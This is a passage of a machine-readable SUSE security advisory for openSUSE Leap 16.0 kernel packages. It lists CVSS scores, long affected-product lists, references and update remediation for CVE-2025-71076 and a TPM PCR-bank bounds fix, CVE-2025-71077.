"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71076"
},
{
"cve": "CVE-2025-71077",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71077"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntpm: Cap the number of PCR banks\n\ntpm2_get_pcr_allocation() does not cap any upper limit for the number of\nbanks. Cap the limit to eight banks so that out of bounds values coming\nfrom external I/O cause on only limited harm.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71077",
"url": "https://www.suse.com/security/cve/CVE-2025-71077"
},
{
"category": "external",
"summary": "SUSE Bug 1256613 for CVE-2025-71077",
"url": "https://bugzilla.suse.com/1256613"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
